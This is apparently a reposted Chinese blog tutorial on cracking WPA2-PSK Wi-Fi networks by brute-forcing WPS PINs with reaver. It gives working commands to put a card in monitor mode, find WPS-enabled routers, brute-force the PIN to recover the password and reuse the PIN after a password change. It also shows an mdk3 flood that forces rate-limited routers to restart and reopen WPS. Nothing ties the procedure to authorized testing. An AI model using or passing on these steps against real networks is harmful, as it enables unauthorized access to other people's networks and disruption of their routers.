使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

大家好，我是全栈君，很高兴再次与大家见面。【前言】现在大多数路由器都默认使用WPA2-PSK加密方式保护无线网络，相比WEP加密方式更难破解。使用字典破解需要耗费时间整理字典，并且破解效率较低。然而，现在大多数路由器都支持WPS功能，用户可以使用PIN码登录路由器。这个PIN码只有8位长度，可能的取值只有11000种（注意，不是10^8种）。因此，我们可以采用简单粗暴的穷举PIN码破解方法，而且在目标AP开启WPS功能的情况下，这种方法可以百分之百地破解成功。虽然这是一种古老的破解手段，但至今仍然有效。【操作步骤】1、将无线网卡切换到监听模式：airmon-ng start wlan0 2、扫描附近的WLAN网络（可以在步骤1完成后的提示信息中找到参数值）：airodump-ng wlan0mon

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂] 3、找到开启了WPS功能且可以使用PIN码登录的路由器，并记录下该AP的BSSID（类似于MAC地址）：wash -i wlan0mon

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂] 3、开始进行PIN码穷举破解（注意末尾的参数是两个小写字母v）：reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv 参数说明：-i 无线网卡名称 -b 目标AP的MAC地址 -a 自动检测目标AP最佳配置 -S 使用最小的DH key，可以提高破解速度 -vv 显示更多的非严重警告（注意这是两个小写字母v） -d 每次穷举之间的延迟，默认为1秒 -c 信道编号 -p 四位或八位的PIN码 //使用8位PIN码可以直接找到密码。

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂] 4、等待破解完成（这个过程可能需要很长时间，取决于目标AP，我曾经花费了12个小时才破解成功），期间我们可以查看破解所花费的时间、预计剩余时间和PIN码穷举进度信息：

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂] 破解完成后，查看并记录下PIN码和密码：使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂] 5、获得PIN码后，即使路由器更改了密码，我们也可以通过PIN码快速获取新密码。以下是获取到的信息示例：reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -p 12316977 【注意事项】1、如果在执行reaver命令后看到WARNING: Failed to associate with xx:xx:xx:xx:xx:xx这样的提示信息，说明您选择的路由器不支持或已关闭WPS功能。在这种情况下，请执行wash命令并重新选择一个路由器。2、如果在执行reaver命令后看到warning detected ap rate limiting waiting 60 seconds before re-checking这样的提示信息，表示目标路由器开启了防止PIN码破解的功能。由于我们是通过穷举PIN码进行破解的，当连续使用超过一定次数的PIN码后，路由器会暂时锁定WPS功能一段时间。在这种情况下，要么耐心等待WPS功能恢复，要么执行mdk3 wlan0mon a -a xx:xx:xx:xx:xx:xx（这是上面目标AP的MAC地址）命令来主动或被动重启路由器以恢复WPS功能。